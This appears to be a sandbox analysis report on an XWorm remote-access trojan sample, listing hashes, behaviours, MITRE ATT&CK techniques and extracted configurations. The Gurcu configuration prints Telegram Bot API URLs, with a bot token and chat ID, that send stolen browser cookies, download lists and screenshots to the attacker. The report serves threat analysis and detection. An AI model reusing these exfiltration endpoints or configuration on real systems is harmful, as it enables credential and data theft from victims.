General
Target: XWorm-RAT
Size: 286KB
Sample: 241205-n96pestmgz
MD5: 3e93b5fa005b274eb84d23478ec99b48
SHA1: a0952ac33f53143430b3d95f8d040fe43244b107
SHA256: bcd1d83e9ada9ee87dc4b81ae89bf9ec7ff393291498a06a6fdd1beda496e947
SHA512: 5339e319df657b7b366129b27141ac6f2e668f668e6916977f9506127df3777b68e64d587757525bcdcfc4f5f4236a0433923bc38819d84226aec0a0892dd313
SSDEEP: 6144:1yssgpOL/saqkPV9FemLtcIDSsmwf9KvZJT3CqbMrhryf65NRPaCieMjAkvCJv1j:kssgpOL/saqkPV9FemLtcIDSsmwf9Kvs
Static task: static1
Malware Config
Extracted: xworm
  C2: 127.0.0.1:7000
  LDr3dSUbweENStU4
  install_file: USB.exe
Extracted: gurcu
  https://api.telegram.org/bot7661594921:AAFaXMAKOmV5u6KsEaGlDyc48-xcrQUMR_U/sendDocument?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.21%20kb
  https://api.telegram.org/bot7661594921:AAFaXMAKOmV5u6KsEaGlDyc48-xcrQUMR_U/sendMessage?chat_id=2024893777
  https://api.telegram.org/bot7661594921:AAFaXMAKOmV5u6KsEaGlDyc48-xcrQUMR_U/getUpdates?offset=-
  https://api.telegram.org/bot7661594921:AAFaXMAKOmV5u6KsEaGlDyc48-xcrQUMR_U/sendDocument?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take
Targets
Target: XWorm-RAT (286KB; hashes as listed under General)
- Detect Xworm Payload
- Gurcu family
- Xworm family
- Executes dropped EXE
- Loads dropped DLL
- Uses the VBS compiler for execution
- Adds Run key to start application
- Legitimate hosting services abused for malware hosting/C2
- Looks up external IP address via web service
  Uses a legitimate IP lookup service to find the infected system's external IP.
- Enumerates processes with tasklist
MITRE ATT&CK Enterprise v15 (count of matching techniques in parentheses)
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Defense Evasion
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Impair Defenses (1)
    Disable or Modify Tools (1)
  Modify Registry (4)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)